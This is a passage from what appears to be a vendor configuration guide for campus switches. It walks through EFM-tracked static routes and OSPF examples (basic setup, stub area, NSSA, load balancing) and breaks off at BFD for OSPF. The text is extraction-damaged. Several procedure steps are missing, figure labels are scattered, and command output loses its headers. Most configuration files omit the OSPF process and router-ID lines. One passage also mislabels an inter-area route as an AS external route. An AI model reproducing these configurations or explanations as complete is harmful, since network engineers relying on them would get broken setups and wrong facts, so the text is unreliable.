structures. Unlike dynamic routing protocols, static routes do not have a dedicated detection
mechanism. If a fault occurs, static routes cannot detect the fault, and the network
administrator must delete the corresponding static route. This delays the link switchover and
may cause lengthy service interruptions. As networks develop quickly, more and more IP
networks are used to carry multiple services such as voice and video services. These services
pose high requirements on network reliability, and fast fault detection and processing. EFM
for IPv4 static routes can be configured to provide the detection mechanism for static routes
so that the static routes can detect the link quality changes in real time and switch services
immediately.
Configuration Notes
l By default, EFM is disabled globally and on interfaces.
l After EFM OAM is enabled on an interface, the interface starts to send OAM PDUs to
perform the point-to-point EFM link detection. EFM link detection can be implemented
between two interfaces only after EFM OAM is enabled on the peer interface.
As shown in Figure 9-5, SwitchA connects to the NMS across a network segment through
SwitchB. SwitchA and SwitchB need to detect the link quality in real time. When the link
between them becomes faulty, the corresponding static route is deleted from the IP routing
table. Then traffic switches from the faulty link to a normal route to improve network
reliability.
Figure 9-5 Networking for configuring EFM for a static IPv4 route
G E 1 /0 /1 G E 1 /0 /2
1 9 2 .1 6 8 .1 .1 /2 4 1 9 2 .1 6 8 .2 .2 /2 4
G E 1 /0 /1 1 9 2 .1 6 8 .2 .1 /2 4
S w it c h A V L A N IF 1 0 S w it c h B NMS
1 9 2 .1 6 8 .1 .2 /2 4

1. Enable EFM OAM globally and on interfaces of SwitchA and SwitchB to implement
real-time link quality detection.
2. Configure a static route from SwitchA to the NMS and binds the static route to the EFM
state to associate the static route with EFM. When a link where the static routes resides
becomes faulty, traffic switches to a route without link faults.
Procedure
Step 1 Specify the VLAN to which the interfaces belong.
# Configure SwitchA. The configuration of SwitchB is similar to that of SwitchA.
[SwitchA] vlan 10

# Configure SwitchA. The configuration of SwitchB is similar to that of SwitchA.
Step 3 Configure an EFM session between SwitchA and SwitchB.

# Enable EFM OAM on SwitchA.
[SwitchA] efm enable //Enable EFM globally.
[SwitchA-GigabitEthernet1/0/1] efm enable //Enable EFM on an interface.
# Enable EFM OAM on SwitchB.

[SwitchB] efm enable //Enable EFM globally.
[SwitchB-GigabitEthernet1/0/1] efm enable //Enable EFM on an interface.
Step 4 Configure a static route and bind it to the EFM state.

# Configure a static route from SwitchA to the external network and bind it to the EFM state
of GigabitEthernet1/0/1.
[SwitchA] ip route-static 192.168.2.0 24 192.168.1.2 track efm-state
gigabitethernet1/0/1

# After the configuration is complete, run the display efm session all command on SwitchA
and SwitchB. The command output shows that an EFM session has been set up and in detect

mode. That is, the interface is in handshake state. The following uses the display on SwitchA
as an example.
[SwitchA] display efm session all
Interface EFM State Loopback Timeout
----------------------------------------------------------------------
GigabitEthernet1/0/1 detect --
# Check the IP routing table on SwitchA. The IP routing table contains the static route.
------------------------------------------------------------------------------

192.168.1.0/24 Direct 0 0 D 192.168.1.1 Vlanif10
192.168.1.1/32 Direct 0 0 D 127.0.0.1 Vlanif10
192.168.2.0/24 Static 60 0 RD 192.168.1.2 Vlanif10
# Run the undo efm enable command in the view of GigabitEthernet1/0/1 on SwitchB to
simulate a link fault.
[SwitchB-GigabitEthernet1/0/1] undo efm enable
# Run the display efm session all command on SwitchA. The command output shows that the
EFM OAM protocol state is discovery, indicating that the interface is in OAM discovery
state.
----------------------------------------------------------------------
GigabitEthernet1/0/1 discovery --
# Check the IP routing table on SwitchA. The IP routing table does not contain the static route
192.168.2.0/24. This is because the static route is bound to the EFM state. After EFM OAM
detects a link fault, it rapidly notifies SwitchA that the static route is unavailable.
------------------------------------------------------------------------------

192.168.1.0/24 Direct 0 0 D 192.168.1.1 Vlanif10
192.168.1.1/32 Direct 0 0 D 127.0.0.1 Vlanif10
# Run the efm enable command in the view of GigabitEthernet1/0/1 on SwitchB to simulate
link recovery.
[SwitchB-GigabitEthernet1/0/1]efm enable
# Run the display efm session all command on SwitchA. The command output shows that the
EFM OAM protocol state is detect, indicating that the interface is in handshake state again.
----------------------------------------------------------------------
GigabitEthernet1/0/1 detect --

# Check the IP routing table on SwitchA. The IP routing table contains the static route
192.168.2.0/24 again. After EFM OAM detects that the link recovers from a fault, it rapidly
notifies that the bound static route is valid again.
------------------------------------------------------------------------------

192.168.1.0/24 Direct 0 0 D 192.168.1.1 Vlanif10
192.168.1.1/32 Direct 0 0 D 127.0.0.1 Vlanif10
192.168.2.0/24 Static 60 0 RD 192.168.1.2 Vlanif10
----End
Configuration Files
#
sysname SwitchA
#
vlan batch 10
#
efm enable
#
interface Vlanif10
ip address 192.168.1.1 255.255.255.0
#
efm enable
#
ip route-static 192.168.2.0 255.255.255.0 192.168.1.2 track efm-state
#
return

#
sysname SwitchB
#
vlan batch 10 20
#
efm enable
#
interface Vlanif10
ip address 192.168.1.2 255.255.255.0
#
interface Vlanif20
ip address 192.168.2.2 255.255.255.0
#
efm enable
#
#
return

Video
9.2 Typical OSPF Configuration
9.2.1 Example for Configuring Basic OSPF Functions
Introduction to OSPF
The Open Shortest Path First (OSPF) protocol is a link-state Interior Gateway Protocol (IGP)
developed by the Internet Engineering Task Force (IETF). OSPF Version 2 defined in RFC
2328 is used in IPv4.
OSPF is loop-free, provides fast route convergence, and supports area partitioning, equal-cost
routes, authentication, and multicast transmission. Therefore, OSPF is widely used as the
mainstream IGP in various industries, including the enterprise, carrier, government, finance,
education, and health care industries.
OSPF uses the hierarchical design, provides various routing policies, applies to networks of
different sizes and topologies. OSPF is often the first choice for you to deploy an IGP.
Configuration Notes
l Each router ID in an OSPF process must be unique on an OSPF network. Otherwise, the
OSPF neighbor relationship cannot be established and routing information is incorrect.
You are advised to configure a unique router ID for each OSPF process on an OSPF
device.
l OSPF partitions an AS into different areas, in which Area 0 is the backbone area. OSPF
requires that all non-backbone areas maintain the connectivity with the backbone area
and devices in the backbone area maintain the connectivity with each other.
l Network types of interfaces on both ends of a link must be the same; otherwise, the two
interfaces cannot establish an OSPF neighbor relationship. When the network types of
OSPF interfaces on both ends are broadcast and P2P respectively, the two OSPF
interfaces can still establish an OSPF neighbor relationship but cannot learn routing
information from each other.
l The IP address masks of OSPF interfaces on both ends of a link must be the same;
otherwise, the two OSPF interfaces cannot establish an OSPF neighbor relationship. On
a P2MP network, however, you can run the ospf p2mp-mask-ignore command to
disable a device from checking the network mask so that an OSPF neighbor relationship
can be established.
l On a broadcast or NBMA network, there must be at least one OSPF interface of which
the DR priority is not 0 to ensure that the DR can be elected. Otherwise, the neighbor
status of devices on both ends can only be 2-Way.
l Table 9-1 lists applicable products and versions of this configuration example.


Product Product Software Version
Model
S12700 S12708 and V200R005C00, V200R006C00, V200R007C00,

S12712 V200R007C20, V200R008C00, V200R009C00
S12704 V200R008C00, V200R009C00
NOTE
As shown in Figure 9-6, three switches, SwitchA, SwitchB, and SwitchC reside on the OSPF
network. The three switches need to communicate with each other, and SwitchA and SwitchB
function as core switches to support network expansion.
Figure 9-6 Networking diagram for configuring basic OSPF functions

A re a 1 S w it c h A A re a 0
1 9 2 .1 6 8 .1 .1 /2 4 1 9 2 .1 6 8 .0 .1 /2 4
S w it c h C V L A N IF 2 0 V L A N IF 1 0 S w it c h B
G E 1 /0 /2 G E 1 /0 /1
G E 1 /0 /1 G E 1 /0 /1
1 9 2 .1 6 8 .1 .2 /2 4 1 9 2 .1 6 8 .0 .2 /2 4
1. Configure an IP address for each VLANIF interface on each switch and specify the
VLAN to which the interfaces belong to implement interworking.
2. Configure basic OSPF functions on each switch and partition the OSPF network into
Area 0 and Area 1 with SwitchA as the area border router (ABR). Consequently, the area
where SwitchA and SwitchB reside become the backbone area and can be used to
expand the OSPF network.
Procedure
configuration of SwitchA, and are not mentioned here.


Step 3 Configure basic OSPF functions.

[SwitchA] ospf 1 router-id 10.1.1.1 //Create an OSPF process 1 with the router
ID 10.1.1.1.
[SwitchA-ospf-1] area 0 //Create Area 0 and enter the Area 0 view.
[SwitchA-ospf-1-area-0.0.0.0] network 192.168.0.0 0.0.0.255 //Configure a
network segment in Area 0.
[SwitchA-ospf-1] area 1 //Create Area 1 and enter the Area 1 view.
[SwitchA-ospf-1-area-0.0.0.1] network 192.168.1.0 0.0.0.255 //Configure a
network segment in Area 1.
[SwitchA-ospf-1-area-0.0.0.1] return
[SwitchB-ospf-1] area 0
[SwitchB-ospf-1-area-0.0.0.0] return
[SwitchC-ospf-1] area 1
[SwitchC-ospf-1-area-0.0.0.1] return

# Check information about OSPF neighbors of SwitchA.
<SwitchA> display ospf peer

Neighbors

DR: 192.168.0.2 BDR: 192.168.0.1 MTU: 0
Neighbors



DR: 192.168.1.2 BDR: 192.168.1.1 MTU: 0
# Check OSPF routing information on SwitchC.

<SwitchC> display ospf routing

Routing Tables
Routing for Network

Destination Cost Type NextHop AdvRouter Area
192.168.1.0/24 1 Transit 192.168.1.2 10.3.3.3 0.0.0.1
192.168.0.0/24 2 Inter-area 192.168.1.1 10.1.1.1 0.0.0.1
Total Nets: 2
Intra Area: 1 Inter Area: 1 ASE: 0 NSSA: 0
The preceding command output shows that SwitchC has a route to 192.168.0.0/24 and the
route is an inter-area route.
# Check the routing table on SwitchB and perform the ping operation to test the connectivity
between SwitchB and SwitchC.
<SwitchB> display ospf routing

Routing Tables
Routing for Network

192.168.0.0/24 1 Transit 192.168.0.2 10.2.2.2 0.0.0.0
192.168.1.0/24 2 Inter-area 192.168.0.1 10.1.1.1 0.0.0.0
Total Nets: 2
The preceding command output shows that SwitchB has a route to 192.168.1.0/24 and the
route is an inter-area route.
# On SwitchB, perform a ping operation to test the connectivity between SwitchB and
SwitchC.
<SwitchB> ping 192.168.1.2

0.00% packet loss
----End
Configuration Files
#
sysname SwitchA

#
vlan batch 10 20
#
interface Vlanif10
ip address 192.168.0.1 255.255.255.0
#
interface Vlanif20
ip address 192.168.1.1 255.255.255.0
#
#
#
area 0.0.0.0
network 192.168.0.0 0.0.0.255
area 0.0.0.1
network 192.168.1.0 0.0.0.255
#
return

#
sysname SwitchB
#
vlan batch 10
#
interface Vlanif10
ip address 192.168.0.2 255.255.255.0
#
#
area 0.0.0.0
network 192.168.0.0 0.0.0.255
#
return

#
sysname SwitchC
#
vlan batch 20
#
interface Vlanif20
ip address 192.168.1.2 255.255.255.0
#
#
area 0.0.0.1
network 192.168.1.0 0.0.0.255
#
return

9.2.2 Example for Configuring an OSPF Stub Area
Introduction to a Stub Area

A stub area is an area that does not allow an ABR to advertise received AS external routes. In
a stub area, the routing table size and transmitted routing information volume of routers are
greatly reduced. A stub area is often placed at the edge of an AS. To ensure the reachability of
a destination outside the AS, the ABR in the stub area generates a default route and advertises
it to the non-ABR routers in the stub area.
Assume that a device of Company H connects to the backbone area through a single link. The
device has low performance and a small routing table. The area where the device resides
needs to access other areas or network segments outside the OSPF area, and the next-hop
address of routes of the device is the IP address of the next-hop core device of the link.
Therefore, the area where the device resides does not need to learn a large number of OSPF
external routes and can be configured as a stub area. This configuration can reduce the routing
table size of the area and resource consumption of the device.
Configuration Notes
l The backbone area cannot be configured as a stub area.
l An ASBR cannot exist in a stub area. That is, external routes are not advertised in a stub
area.
l A virtual link cannot pass through a stub area.
l To configure an area as a stub area, configure stub area attributes on all the routers in this
area using the stub command.
l To configure an area as a totally stub area, run the stub command on all the routers in
this area, and run the stub no-summary command on the ABR in this area.
l The stub no-summary command can only be configured on an ABR to prevent the
ABR from advertising Type 3 LSAs within a stub area. After this command is
configured on the ABR, the area becomes a totally stub area, the number of routing
entries on routers in the area is reduced, and there are only intra-area routes and a default
route advertised by the ABR.

Model
S12700 S12708 and V200R005C00, V200R006C00, V200R007C00,

S12712 V200R007C20, V200R008C00, V200R009C00
S12704 V200R008C00, V200R009C00
NOTE

As shown in Figure 9-7, SwitchA, SwitchB, and SwitchC run OSPF, and the OSPF network
is divided into Area 0 and Area 1. SwitchB functions as an ASBR to communicate with
external networks. The OSPF routing table size on SwitchC needs to be reduced without
affecting communication.
Figure 9-7 Networking diagram for OSPF stub area configuration

S w it c h A
1 9 2 .1 6 8 .1 .2 /2 4 1 9 2 .1 6 8 .0 .2 /2 4
V L A N IF 2 0 A re a 1 A r e a 0 V L A N IF 1 0 A S B R
G E 1 /0 /1 G E 1 /0 /1
G E 1 /0 /2 G E 1 /0 /1
S w it c h C V L A N IF 2 0 V L A N IF 1 0 S w it c h B
1 9 2 .1 6 8 .1 .1 /2 4 1 9 2 .1 6 8 .0 .1 /2 4
S tu b
1. Configure basic OSPF functions on each switch to implement interworking in the OSPF
network.
2. Configure a static route on SwitchB and import the route to the OSPF routing table to
ensure that there is a reachable route from the OSPF network to external networks.
3. Configure Area 1 as a stub area to reduce the OSPF routing table size on SwitchC.
4. Prohibit the ABR (SwitchA) in Area 1 from advertising Type 3 LSAs within the stub
area to configure Area 1 as a totally stub area. This configuration minimizes the OSPF
routing table size on SwitchC.
Procedure

# Configure SwitchA. The configurations of Switch B and SwitchC are similar to the


Step 4 Configure SwitchB to import a static route.

[SwitchB] ip route-static 10.0.0.0 8 null 0
[SwitchB] ospf 1
[SwitchB-ospf-1] import-route static type 1 //SwitchB functions as an ASBR and
imports external routes.
# Check the OSPF routing table on SwitchC. The command output shows that the OSPF
routing table contains an AS external route.
[SwitchC] display ospf routing

Routing Tables
Routing for Network

192.168.1.0/24 1 Transit 192.168.1.2 10.3.3.3 0.0.0.1
192.168.0.0/24 2 Inter-area 192.168.1.1 10.1.1.1 0.0.0.1
Routing for ASEs

Destination Cost Type Tag NextHop AdvRouter
10.0.0.0/8 3 Type1 1 192.168.1.1 10.2.2.2
Total Nets: 3
Step 5 Configure Area 1 as a stub area.

[SwitchA] ospf 1
[SwitchA-ospf-1-area-0.0.0.1] stub //Configure Area 1 as a stub area. All the
routers in Area 1 must have the stub command configured.

[SwitchC] ospf 1
[SwitchC-ospf-1-area-0.0.0.1] stub //Configure Area 1 as a stub area. All the
routers in Area 1 must have the stub command configured.
routing table does not contain any AS external route but contains a default route to external
networks.

Routing Tables
Routing for Network

192.168.1.0/24 1 Transit 192.168.1.2 10.3.3.3 0.0.0.1
0.0.0.0/0 2 Inter-area 192.168.1.1 10.1.1.1 0.0.0.1
192.168.0.0/24 2 Inter-area 192.168.1.1 10.1.1.1 0.0.0.1
Total Nets: 3
Step 6 Configure Area 1 as a totally stub area.

[SwitchA] ospf 1
[SwitchA-ospf-1-area-0.0.0.1] stub no-summary //Configure Area 1 as a totally
stub area. An ABR in Area 1 must have the stub no-summary command configured,
while other routers in Area 1 must have the stub command configured.

routing table contains only an intra-area OSPF route and a default route to external networks
but does not contain the AS external route 192.168.0.0/24.

Routing Tables
Routing for Network

192.168.1.0/24 1 Transit 192.168.1.2 10.3.3.3 0.0.0.1
0.0.0.0/0 2 Inter-area 192.168.1.1 10.1.1.1 0.0.0.1
Total Nets: 2
----End
Configuration Files
#
sysname SwitchA
#
vlan batch 10 20

#
interface Vlanif10
ip address 192.168.0.1 255.255.255.0
#
interface Vlanif20
ip address 192.168.1.1 255.255.255.0
#
#
#
area 0.0.0.0
network 192.168.0.0 0.0.0.255
area 0.0.0.1
network 192.168.1.0 0.0.0.255
stub no-summary
#
return

#
sysname SwitchB
#
vlan batch 10
#
interface Vlanif10
ip address 192.168.0.2 255.255.255.0
#
#
import-route static type 1
area 0.0.0.0
network 192.168.0.0 0.0.0.255
#
ip route-static 10.0.0.0 255.0.0.0 NULL0
#
return

#
sysname SwitchC
#
vlan batch 20
#
interface Vlanif20
ip address 192.168.1.2 255.255.255.0
#
#
area 0.0.0.1
network 192.168.1.0 0.0.0.255
stub
#
return

9.2.3 Example for Configuring an OSPF NSSA

Introduction to an NSSA
An NSSA is a special type of OSPF area. An NSSA is similar to a stub area in that neither of
them transmits routes learned from other areas in the AS they reside. The difference between
them is that an NSSA allows AS external routes to be imported and advertised in the entire
AS whereas a stub area does not. To ensure the reachability of AS external routes, the ABR in
an NSSA generates a default route and advertises the route to the other routers in the NSSA.
An NSSA allows Type 7 LSAs (NSSA External LSAs) to be advertised. Type 7 LSAs are
generated by the ASBR of the NSSA. When reaching the ABR of the NSSA, these LSAs can
be translated into Type 5 LSAs (AS External LSAs) and advertised to other areas.
Assume that a device of Company H connects to the backbone area through a single link. The
device has low performance and a small routing table. Engineers of this company want to
configure the area where the device resides as a stub area to reduce the routing table size and
system resource consumption of the device. In addition, AS external routes need to be
imported and advertised to the entire AS; however, a stub area cannot meet this requirement
because it does not allow received AS external routes to be advertised, and so the area needs
to be configured as an NSSA.
Configuration Notes
l The backbone area cannot be configured as an NSSA.
l To configure an area as an NSSA, configure NSSA attributes on all the routers in this
area.
l A virtual link cannot pass through an NSSA.
l To reduce the number of LSAs that are transmitted to the NSSA, configure no-summary
on an ABR. This prevents the ABR from transmitting Type 3 LSAs to the NSSA,
making the area a totally NSSA.

Model
S12700 S12708 and V200R005C00, V200R006C00, V200R007C00,

S12712 V200R007C20, V200R008C00, V200R009C00
S12704 V200R008C00, V200R009C00
NOTE
As shown in Figure 9-8, SwitchA, SwitchB, SwitchC, and SwitchD run OSPF, and the OSPF
network is divided into Area 0 and Area 1. Devices in Area 1 need to be prohibited from
receiving external routes imported from other areas and to communicate with external

networks using the external routes imported by the ASBR in Area 1. SwitchB transmits many
services, so SwitchA needs to translate Type 7 LSAs into Type 5 LSAs and send the LSAs to
other OSPF areas.
NOTE
Figure 9-8 Networking diagram for OSPF NSSA configuration

A re a 1 A re a 0
1 9 2 .1 6 8 .3 .1 /2 4 S w it c h A 1 9 2 .1 6 8 .1 .1 /2 4
1 9 2 .1 6 8 .3 .2 /2 4 V L A N IF 3 0 V L A N IF 1 0 1 9 2 .1 6 8 .1 .2 /2 4
V L A N IF 3 0 G E 1 /0 /1 G E 1 /0 /2 V L A N IF 1 0
G E 1 /0 /1 G E 1 /0 /1
1 9 2 .1 6 8 .4 .2 /2 4 1 9 2 .1 6 8 .2 .1 /2 4
S w it c h D G E 1 /0 /2 G E 1 /0 /1 G E 1 /0 /2 G E 1 /0 /2 S w it c h C
ASBR V L A N IF 4 0 V L A N IF 2 0
1 9 2 .1 6 8 .4 .1 /2 4 1 9 2 .1 6 8 .2 .2 /2 4
NSSA S w it c h B
1. Configure basic OSPF functions on each switch to implement interworking in the OSPF
network.
2. Configure Area 1 as an NSSA, configure a static route on SwitchD, and configure
SwitchD to import the static route into the OSPF routing table so that switches in Area 1
can communicate with external networks only through SwitchD.
3. Configure SwitchA as an LSA translator to translate Type 7 LSAs into Type 5 LSAs and
send the LSAs to other OSPF areas.
Procedure

# Configure SwitchA. The configuration of SwitchB, SwitchC, and SwitchD are the same as



[SwitchD] ospf 1 router-id 10.4.4.4
[SwitchD-ospf-1] area 1
[SwitchD-ospf-1-area-0.0.0.1] network 192.168.3.0 0.0.0.255
[SwitchD-ospf-1-area-0.0.0.1] quit
[SwitchD-ospf-1] quit
Step 4 Configure Area 1 as an NSSA.

[SwitchA] ospf 1
[SwitchA-ospf-1-area-0.0.0.1] nssa //Configure Area 1 as an NSSA. All the
devices in Area 1 must have the nssa command configured.
[SwitchB] ospf 1
[SwitchB-ospf-1-area-0.0.0.1] nssa //Configure Area 1 as an NSSA. All the

[SwitchD] ospf 1
[SwitchD-ospf-1-area-0.0.0.1] nssa //Configure Area 1 as an NSSA. All the
Step 5 Configure SwitchD to import a static route.

[SwitchD] ip route-static 172.16.0.0 16 null 0
[SwitchD] ospf 1
[SwitchD-ospf-1] import-route static //Configure SwitchD to function as an ASBR
of the NSSA to import external routes.
# Check the OSPF routing table on SwitchC.


Routing Tables
Routing for Network

192.168.1.0/24 1 Transit 192.168.1.2 10.3.3.3 0.0.0.0
192.168.2.0/24 1 Transit 192.168.2.2 10.3.3.3 0.0.0.0
192.168.3.0/24 2 Inter-area 192.168.1.1 10.1.1.1 0.0.0.0
192.168.4.0/24 2 Inter-area 192.168.2.1 10.2.2.2 0.0.0.0
Routing for ASEs
172.16.0.0/16 1 Type2 1 192.168.1.1 10.2.2.2
Total Nets: 5
The command output shows that the AS external routes imported into the NSSA are
advertised by SwitchB to other areas. That is, SwitchB translates Type 7 LSAs into Type 5
LSAs. This is because OSPF selects the ABR with a larger router ID as an LSA translator.
Step 6 Configure SwitchA as an LSA translator.

[SwitchA] ospf 1
[SwitchA-ospf-1-area-0.0.0.1] nssa translator-always
# Wait for 40 seconds and then check the OSPF routing table on SwitchC.

Routing Tables
Routing for Network

192.168.1.0/24 1 Transit 192.168.1.2 10.3.3.3 0.0.0.0
192.168.2.0/24 1 Transit 192.168.2.2 10.3.3.3 0.0.0.0
192.168.3.0/24 2 Inter-area 192.168.1.1 10.1.1.1 0.0.0.0
192.168.4.0/24 2 Inter-area 192.168.2.1 10.2.2.2 0.0.0.0
Routing for ASEs
172.16.0.0/16 1 Type2 1 192.168.1.1 10.1.1.1
Total Nets: 5

The command output shows that the AS external routes imported into the NSSA are
advertised by SwitchA to other areas. That is, SwitchA translates Type 7 LSAs into Type 5
LSAs.
NOTE
By default, the new LSA translator works with the previous LSA translator to translate LSAs for 40
seconds. After 40 seconds, only the new LSA translator translates LSAs.
----End
Configuration Files
#
sysname SwitchA
#
vlan batch 10 30
#
interface Vlanif10
ip address 192.168.1.1 255.255.255.0
#
interface Vlanif30
ip address 192.168.3.1 255.255.255.0
#
#
#
area 0.0.0.0
network 192.168.1.0 0.0.0.255
area 0.0.0.1
network 192.168.3.0 0.0.0.255
nssa translator-always
#
return

#
sysname SwitchB
#
vlan batch 20 40
#
interface Vlanif20
ip address 192.168.2.1 255.255.255.0
#
interface Vlanif40
ip address 192.168.4.2 255.255.255.0
#
#
#
area 0.0.0.0
network 192.168.2.0 0.0.0.255
area 0.0.0.1
network 192.168.4.0 0.0.0.255

nssa
#
return

#
sysname SwitchC
#
vlan batch 10 20
#
interface Vlanif10
ip address 192.168.1.2 255.255.255.0
#
interface Vlanif20
ip address 192.168.2.2 255.255.255.0
#
#
#
area 0.0.0.0
network 192.168.1.0 0.0.0.255
network 192.168.2.0 0.0.0.255
#
return

#
sysname SwitchD
#
vlan batch 30 40
#
interface Vlanif30
ip address 192.168.3.2 255.255.255.0
#
interface Vlanif40
ip address 192.168.4.1 255.255.255.0
#
#
#
import-route static
area 0.0.0.1
network 192.168.3.0 0.0.0.255
network 192.168.4.0 0.0.0.255
nssa
#
ip route-static 172.16.0.0 255.255.0.0 NULL0
#
return
9.2.4 Example for Configuring OSPF Load Balancing

OSPF Load Balancing Overview

Equal-cost multiple path (ECMP) evenly load balances traffic over multiple paths between
each two network nodes. ECMP reduces traffic load on each path and enhances network
robustness. If a routing protocol discovers multiple routes to the same destination and these
routes have the same cost, traffic can be load balanced among the routes. When load
balancing is configured, the router forwards packets according to five factors, namely, the
source addresses, destination addresses, source ports, destination ports, and protocols in the
packets. When the five factors are the same, the router always chooses the next-hop address
that is the same as the last one to send packets. When the five factors are different, the router
chooses the relatively idle path to forward packets.
On an OSPF network, sometimes multiple equal-cost paths exist between two network
elements (NEs), while a single path is hard to carry all service traffic. Users require that all
service traffic be load balanced over multiple paths to improve network reliability and
resource usage. In this case, OSPF can be configured.
Configuration Notes
l The maximum number of equal-cost routes for load balancing can be configured using
the maximum load-balancing command.
l To cancel load balancing, you can set the maximum number of equal-cost routes to 1.

Model
S12700 S12708 and V200R005C00, V200R006C00, V200R007C00,

S12712 V200R007C20, V200R008C00, V200R009C00
S12704 V200R008C00, V200R009C00
NOTE
As shown in Figure 9-9, four switches all belong to Area0 on the OSPF network. Load
balancing needs to be configured so that the traffic from SwitchA is sent to SwitchD through
SwitchB and SwitchC.
NOTE

Figure 9-9 Networking diagram for configuring load balancing among OSPF routes
S w it c h B
1 0 .1 .1 .2 /2 4 1 9 2 .1 6 8 .0 .1 /2 4
G E 1 /0 /1 G E 1 /0 /2
1 7 2 .1 6 .1 .1 /2 4 1 7 2 .1 7 .1 .1 /2 4
V L A N IF 5 0 G E 1 /0 /1 G E 1 /0 /1 V L A N IF 6 0
G E 1 /0 /3 V L A N IF 1 0 V L A N IF 3 0 G E 1 /0 /3
1 0 .1 .1 .1 /2 4 1 9 2 .1 6 8 .0 .2 /2 4
S w it c h A S w it c h D
G E 1 /0 /2 A re a 0 G E 1 /0 /2
1 0 .1 .2 .1 /2 4
G E 1 /0 /1 G E 1 /0 /2 1 9 2 .1 6 8 .1 .2 /2 4
1 0 .1 .2 .2 /2 4 1 9 2 .1 6 8 .1 .1 /2 4
S w it c h C
1. Configure basic OSPF functions on each switch to implement basic connections on the
OSPF network.
2. Configure load balancing on SwitchA.
Procedure
# Configure SwitchA. The configurations of SwitchB, SwitchC, and SwitchD are the same as
the configuration of SwitchA.
# Configure SwitchA. The configurations of SwitchB, SwitchC, and SwitchD are the same as
the configuration of SwitchA.

[SwitchD] ospf 1 router-id 10.10.10.4
# Display the routing table of SwitchA.

------------------------------------------------------------------------------
10.1.1.0/24 Direct 0 0 D 10.1.1.1 Vlanif10

10.1.1.1/32 Direct 0 0 D 127.0.0.1 Vlanif10
10.1.2.0/24 Direct 0 0 D 10.1.2.1 Vlanif20
10.1.2.1/32 Direct 0 0 D 127.0.0.1 Vlanif20
172.16.1.0/24 Direct 0 0 D 172.16.1.1 Vlanif50
172.16.1.1/32 Direct 0 0 D 127.0.0.1 Vlanif50
172.17.1.0/24 OSPF 10 3 D 10.1.2.2 Vlanif20
OSPF 10 3 D 10.1.1.2 Vlanif10
192.168.0.0/24 OSPF 10 2 D 10.1.1.2 Vlanif10
192.168.1.0/24 OSPF 10 2 D 10.1.2.2 Vlanif20
As shown in the routing table, two next hops 10.1.1.2 (SwitchB) and 10.1.2.2 (SwitchC) of
SwitchA both become valid routes as the maximum number of equal-cost routes is 16 for a
modular switch and 8 for a fixed switch.
Step 4 Configure the weight of equal-cost routes on SwitchA.

If you do not want to implement load balancing between SwitchB and SwitchC, set the weight
of equal-cost routes to specify the next hop.
[SwitchA] ospf 1
[SwitchA-ospf-1] nexthop 10.1.2.2 weight 1 //Specify the weight parameter to
set the priority of equal-cost routes. The default weight value is 255. A larger
priority value indicates a lower priority.
# Check the routing table on SwitchA.

------------------------------------------------------------------------------
10.1.1.0/24 Direct 0 0 D 10.1.1.1 Vlanif10

10.1.1.1/32 Direct 0 0 D 127.0.0.1 Vlanif10
10.1.2.0/24 Direct 0 0 D 10.1.2.1 Vlanif20
10.1.2.1/32 Direct 0 0 D 127.0.0.1 Vlanif20
172.16.1.0/24 Direct 0 0 D 172.16.1.1 Vlanif50
172.16.1.1/32 Direct 0 0 D 127.0.0.1 Vlanif50
172.17.1.0/24 OSPF 10 3 D 10.1.2.2 Vlanif20
192.168.0.0/24 OSPF 10 2 D 10.1.1.2 Vlanif10
192.168.1.0/24 OSPF 10 2 D 10.1.2.2 Vlanif20
As shown in the routing table, the priority of the next hop 10.1.2.2 (SwitchC) with the weight
1 is higher than that of 10.1.1.2 (SwitchB), after the weight is set for equal-cost routes. OSPF
selects the route with the next hop 10.1.2.2 as the optimal route.
----End
Configuration Files
#
sysname SwitchA
#
vlan batch 10 20 50
#
interface Vlanif10
ip address 10.1.1.1 255.255.255.0
#
interface Vlanif20
ip address 10.1.2.1 255.255.255.0
#
interface Vlanif50
ip address 172.16.1.1 255.255.255.0
#
#
#
#

nexthop 10.1.2.2 weight 1

area 0.0.0.0
network 10.1.1.0 0.0.0.255
network 10.1.2.0 0.0.0.255
network 172.16.1.0 0.0.0.255
#
return
#
sysname SwitchB
#
vlan batch 10 30
#
interface Vlanif10
ip address 10.1.1.2 255.255.255.0
#
interface Vlanif30
ip address 192.168.0.1 255.255.255.0
#
#
#
area 0.0.0.0
network 10.1.1.0 0.0.0.255
network 192.168.0.0 0.0.0.255
#
return
#
sysname SwitchC
#
vlan batch 20 40
#
interface Vlanif20
ip address 10.1.2.2 255.255.255.0
#
interface Vlanif40
ip address 192.168.1.1 255.255.255.0
#
#
#
area 0.0.0.0
network 10.1.2.0 0.0.0.255
network 192.168.1.0 0.0.0.255
#
return
#
sysname SwitchD
#
vlan batch 30 40 60
#
interface Vlanif30
ip address 192.168.0.2 255.255.255.0

#
interface Vlanif40
ip address 192.168.1.2 255.255.255.0
#
interface Vlanif60
ip address 172.17.1.1 255.255.255.0
#
#
#
#
area 0.0.0.0
network 172.17.1.0 0.0.0.255
network 192.168.0.0 0.0.0.255
network 192.168.1.0 0.0.0.255
#
return
9.2.5 Example for Configuring BFD for OSPF

BFD for OSPF Overview
Bidirectional forwarding detection (BFD) is a mechanism to detect communication faults
between forwarding engines. BFD detects connectivity of a data protocol on a path between
two systems. The path can be a physical or logical link. In BFD for OSPF, a BFD session is
associated with OSPF. The BFD session quickly detects a link fault and then notifies OSPF of
the fault. This speeds up OSPF's response to the change of the network topology.
Any link fault or topology change on the network will cause the device's route recalculation.
If the OSPF detection mechanism is used, the route recalculation time is the OSPF protocol
convergence time. In this case, OSPF detects faults in seconds. In high-speed data
transmission, for example, at gigabit rates, the detection time longer than one second results in
the loss of a large amount of data. In delay-sensitive services such as the voice service, the
delay longer than one second is unacceptable. When an OSPF network requires high
reliability or the services running on the network is delay-sensitive, BFD for OSPF can be
configured. BFD speeds up OSPF network convergence and then OSPF can detect the fault in
milliseconds once a fault occurs in the link between neighbors.
Configuration Notes
l BFD needs to be configured on the two ends between which the OSPF neighbor
relationship is established.
l The two ends that establish BFD sessions must be located in the same network segment
on an OSPF area.
l The ospf bfd enable and ospf bfd block commands are mutually exclusive and cannot
be enabled at the same time.


Model
S12700 S12708 and V200R005C00, V200R006C00, V200R007C00,

S12712 V200R007C20, V200R008C00, V200R009C00
S12704 V200R008C00, V200R009C00
NOTE
As shown in Figure 9-10, OSPF runs among SwitchA, SwitchB, and SwitchC, and the switch
between SwitchA and SwitchB only provides the transparent transmission function. SwitchA
and SwitchB need to quickly detect the status of the link between them. When the link
SwitchA-SwitchB is faulty, services can be quickly switched to the backup link SwitchA-
SwitchC-SwitchB.
NOTE
Figure 9-10 Networking diagram of configuring BFD for OSPF
A re a 0
